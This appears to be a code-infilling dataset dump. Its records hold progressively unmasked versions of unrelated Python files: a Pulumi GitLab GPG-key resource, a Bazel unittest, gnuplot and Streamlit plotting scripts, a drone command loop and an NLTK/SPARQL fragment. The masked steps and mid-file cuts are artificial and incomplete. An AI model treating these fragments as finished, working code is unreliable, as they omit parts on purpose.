if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-5": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport copy\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom . import _utilities\n\n__all__ = ['UserGpgKeyArgs', 'UserGpgKey']\n\[email protected]_type\nclass UserGpgKeyArgs:\n def __init__(__self__, *,\n key: pulumi.Input[str],\n user_id: Optional[pulumi.Input[int]] = None):\n \"\"\"\n The set of arguments for constructing a UserGpgKey resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n pulumi.set(__self__, \"key\", key)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Input[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: pulumi.Input[str]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"user_id\", value)\n\n\[email protected]_type\nclass _UserGpgKeyState:\n def __init__(__self__, *,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if key_id is not None:\n pulumi.set(__self__, \"key_id\", key_id)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"created_at\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"keyId\")\n def key_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, \"key_id\")\n\n @key_id.setter\n def key_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"key_id\", value)\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"user_id\", value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n @overload\n def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n key: Optional[pulumi.Input[str]] = None,\n user_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n @overload\n def __init__(__self__,\n resource_name: str,\n args: UserGpgKeyArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.__dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n key: Optional[pulumi.Input[str]] = None,\n user_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"user_id\"] = user_id\n __props__.__dict__[\"created_at\"] = None\n __props__.__dict__[\"key_id\"] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey',\n resource_name,\n __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n\n __props__.__dict__[\"created_at\"] = created_at\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"key_id\"] = key_id\n __props__.__dict__[\"user_id\"] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @property\n @pulumi.getter(name=\"keyId\")\n def key_id(self) -> pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, \"key_id\")\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n",
"step-ids": [
11,
19,
22,
26,
29
]
}
|
[
11,
19,
22,
26,
29
] |
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
<|reserved_special_token_0|>
def test_fib(self):
self.assertEqual(Fib(5), 8)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
def test_ok(self):
self.assertEqual(GetNumber(), 42)
def test_fib(self):
self.assertEqual(Fib(5), 8)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
def test_ok(self):
self.assertEqual(GetNumber(), 42)
def test_fib(self):
self.assertEqual(Fib(5), 8)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from bazel_tutorial.examples.py.lib import GetNumber
from bazel_tutorial.examples.py.fibonacci.fib import Fib
class TestGetNumber(unittest.TestCase):
def test_ok(self):
self.assertEqual(GetNumber(), 42)
def test_fib(self):
self.assertEqual(Fib(5), 8)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
"""A tiny example binary for the native Python rules of Bazel."""
import unittest
from bazel_tutorial.examples.py.lib import GetNumber
from bazel_tutorial.examples.py.fibonacci.fib import Fib
class TestGetNumber(unittest.TestCase):
def test_ok(self):
self.assertEqual(GetNumber(), 42)
def test_fib(self):
self.assertEqual(Fib(5), 8)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "d126efa91b964a3a374d546bb860b39ae26dfa22",
"index": 256,
"step-1": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n <mask token>\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nfrom bazel_tutorial.examples.py.lib import GetNumber\nfrom bazel_tutorial.examples.py.fibonacci.fib import Fib\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "\"\"\"A tiny example binary for the native Python rules of Bazel.\"\"\"\n\nimport unittest\nfrom bazel_tutorial.examples.py.lib import GetNumber\nfrom bazel_tutorial.examples.py.fibonacci.fib import Fib\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
##########################################################################
#
# Draw a 2-D plot for student registration number and the marks secured using gnuplot
#
##########################################################################
import Gnuplot
# create lists to store student marks and regno
student_reg=[]
student_marks=[]
# get the register numbers and marks of the students
n = int(input("Enter number of students: "))
for i in range(0,n):
reg = int(input("Enter RegNo: "))
student_reg.append(reg)
marks=int(input("Enter marks: "))
student_marks.append(marks)
# plot students regno. and students marks
gplt = Gnuplot.Gnuplot(persist=1)
gplt.title("RegNo. V/S Marks")
gplt.xlabel("Student RegNo--->")
gplt.ylabel("Student Marks--->")
d=Gnuplot.Data(student_reg,student_marks,with_="line")
gplt.plot(d)
|
normal
|
{
"blob_id": "dcbbc7098410d771a7151af7c43ac4d0e4d46f18",
"index": 9135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\n<mask token>\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\n<mask token>\ngplt.plot(d)\n",
"step-3": "<mask token>\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n",
"step-4": "import Gnuplot\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n",
"step-5": "##########################################################################\n#\n# Draw a 2-D plot for student registration number and the marks secured using gnuplot \n#\n##########################################################################\n\n\nimport Gnuplot\n\n# create lists to store student marks and regno\nstudent_reg=[]\nstudent_marks=[]\n\n\n# get the register numbers and marks of the students\nn = int(input(\"Enter number of students: \"))\nfor i in range(0,n):\n\treg = int(input(\"Enter RegNo: \"))\n\tstudent_reg.append(reg)\n\tmarks=int(input(\"Enter marks: \"))\n\tstudent_marks.append(marks)\n\n# plot students regno. and students marks\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title(\"RegNo. V/S Marks\")\ngplt.xlabel(\"Student RegNo--->\")\ngplt.ylabel(\"Student Marks--->\")\nd=Gnuplot.Data(student_reg,student_marks,with_=\"line\")\n\ngplt.plot(d)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if button == True:
df = pd.read_csv(upload)
st.write(df.head())
fig = plt.figure()
my = fig.add_subplot(1, 1, 1)
my.scatter(df['sepal.length'], df['petal.length'])
my.set_xlabel('sepal.length')
my.set_ylabel('petal.length')
st.write(fig)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
username = st.text_input('username')
upload = st.file_uploader('uploadfile', type=['csv'])
button = st.button('submit')
if button == True:
df = pd.read_csv(upload)
st.write(df.head())
fig = plt.figure()
my = fig.add_subplot(1, 1, 1)
my.scatter(df['sepal.length'], df['petal.length'])
my.set_xlabel('sepal.length')
my.set_ylabel('petal.length')
st.write(fig)
<|reserved_special_token_1|>
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
username = st.text_input('username')
upload = st.file_uploader('uploadfile', type=['csv'])
button = st.button('submit')
if button == True:
df = pd.read_csv(upload)
st.write(df.head())
fig = plt.figure()
my = fig.add_subplot(1, 1, 1)
my.scatter(df['sepal.length'], df['petal.length'])
my.set_xlabel('sepal.length')
my.set_ylabel('petal.length')
st.write(fig)
<|reserved_special_token_1|>
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
username=st.text_input ("username")
upload=st.file_uploader("uploadfile",type=['csv'])
button=st.button("submit")
if button==True:
df=pd.read_csv(upload)
st.write(df.head())
fig = plt.figure()
my = fig.add_subplot(1,1,1)
my.scatter(df["sepal.length"],df["petal.length"],)
my.set_xlabel("sepal.length")
my.set_ylabel("petal.length")
st.write(fig)
|
flexible
|
{
"blob_id": "72f1547ea7de78a5fe4b583523e592fa25c0ee77",
"index": 2467,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-3": "<mask token>\nusername = st.text_input('username')\nupload = st.file_uploader('uploadfile', type=['csv'])\nbutton = st.button('submit')\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-4": "import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nusername = st.text_input('username')\nupload = st.file_uploader('uploadfile', type=['csv'])\nbutton = st.button('submit')\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-5": "import streamlit as st\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nusername=st.text_input (\"username\")\r\nupload=st.file_uploader(\"uploadfile\",type=['csv'])\r\nbutton=st.button(\"submit\")\r\nif button==True:\r\n df=pd.read_csv(upload)\r\n st.write(df.head())\r\n fig = plt.figure()\r\n my = fig.add_subplot(1,1,1)\r\n my.scatter(df[\"sepal.length\"],df[\"petal.length\"],)\r\n my.set_xlabel(\"sepal.length\")\r\n my.set_ylabel(\"petal.length\")\r\n st.write(fig)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# wilfred.py
# Authors
# Stuart C. Larsen (SCL)
# Daryl W. Bennet (DWB)
# Set up three main modules (command, control, reconnaissance),
# and then enter main event loop.
#
# Command:
# Gather mission priorities and objectives, such as turn left, turn right
# goto GPS 45, 65, land, take off.
#
# Control:
# Fly the craft to complete the command objective.
#
# Reconnaissance:
# Gather information about wilfreds current position.
#
# Main Event Loop:
# Check command listing for new updates, check reconnaisannce for current
# posistion, and then control the craft to the correct zone. Main loop will
# be a very fast feedback loop.
import command
import driver
from debug import *
def mainLoop():
wilfredCommunication = command.Command()
wilfredCommunication.waitForClient()
wilfredCommand = command.Command()
while True:
if not wilfredCommunication.checkConnection():
wilfredCommunication.waitForClient()
commands = wilfredCommunication.getCommand()
for commandData in commands.split('\n'):
cmd = commandData.split(' ')[0].strip()
if cmd == "": continue
args = [arg.strip() for arg in commandData.split(' ')[1:]]
# setMotorSpeed (0-3) (0-100)
if cmd == "setMotorSpeed":
motorNum = int(args[0])
motorSpeed = int(args[1])
wilfredCommand.setMotorSpeed(motorNum, motorSpeed)
elif cmd == "playMeow":
goodMessage("wilfred: playing meow from file: ", args[0])
wilfredCommand.playMeow(args[0])
elif cmd == "getAccel":
goodMessage("wilfred: returning acceleration...")
wilfredCommunication.sendMessage("(0, 0, 0)")
else:
errorMessage("wilfred: command not recognized: ", cmd, ": ", args)
if __name__ == "__main__":
mainLoop()
|
normal
|
{
"blob_id": "a77fb90cdc6e7f9b70f9feeefc2b7f8e93a2d8c5",
"index": 9875,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\nif __name__ == '__main__':\n mainLoop()\n",
"step-4": "import command\nimport driver\nfrom debug import *\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\nif __name__ == '__main__':\n mainLoop()\n",
"step-5": "# wilfred.py\n# Authors\n# Stuart C. Larsen (SCL)\n# Daryl W. Bennet (DWB)\n\n# Set up three main modules (command, control, reconnaissance),\n# and then enter main event loop.\n#\n# Command:\n# Gather mission priorities and objectives, such as turn left, turn right\n# goto GPS 45, 65, land, take off.\n#\n# Control:\n# Fly the craft to complete the command objective.\n#\n# Reconnaissance:\n# Gather information about wilfreds current position.\n#\n# Main Event Loop:\n# Check command listing for new updates, check reconnaisannce for current\n# posistion, and then control the craft to the correct zone. Main loop will\n# be a very fast feedback loop.\n\nimport command\nimport driver\nfrom debug import *\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n\n wilfredCommand = command.Command()\n\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n \n\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == \"\": continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n \n \n # setMotorSpeed (0-3) (0-100)\n if cmd == \"setMotorSpeed\":\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == \"playMeow\":\n goodMessage(\"wilfred: playing meow from file: \", args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == \"getAccel\":\n goodMessage(\"wilfred: returning acceleration...\")\n wilfredCommunication.sendMessage(\"(0, 0, 0)\")\n else:\n errorMessage(\"wilfred: command not recognized: \", cmd, \": \", args)\n \n\nif __name__ == \"__main__\":\n mainLoop()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def document_features(documento):
features = {}
for palavra in palavras_escolhidas:
features['contains(%s)' % (palavra,)] = palavra in documento
return features
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
<|reserved_special_token_0|>
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
